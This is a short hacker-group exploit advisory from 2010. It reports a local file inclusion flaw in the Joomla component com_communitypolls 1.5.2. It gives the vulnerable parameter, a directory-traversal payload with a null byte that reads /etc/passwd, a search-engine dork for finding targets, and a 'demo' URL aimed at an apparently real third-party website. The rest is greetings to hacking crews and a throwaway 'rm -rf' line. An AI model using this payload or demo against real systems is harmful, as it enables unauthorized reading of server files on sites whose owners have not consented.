[!]===========================================================================[!] [~] Joomla Component com_communitypolls LFI Vulnerability [~] Author : kaMtiEz (kamzcrew@yahoo.com) [~] Homepage : http://www.indonesiancoder.com [~] Date : 16 February, 2010 [!]===========================================================================[!] [ Software Information ] [+] Vendor : http://www.corejoomla.com/ [+] Price : free [+] Vulnerability : LFI [+] Dork : inurl:"CIHUY" ;) [+] Download : http://www.corejoomla.com/downloads/community-polls/24-comcommunitypollsv1-5-2.html [+] Version : 1.5.2 maybe lower also affected [!]===========================================================================[!] [ Vulnerable File ] http://127.0.0.1/index.php?option=com_communitypolls&controller=[INDONESIANCODER] [ XpL ] ../../../../../../../../../../../../../../../etc/passwd%00 [ d3m0 ] http://www.thesearchers.org/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00 etc etc etc ;] [!]===========================================================================[!] [ Thx TO ] [+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah [+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack [+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS [+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk [ NOTE ] [+] Rawk ! [+] rm -rf [ QUOTE ] [+] we are not dead INDONESIANCODER stil r0x [+] nothing secure .. [+] e0f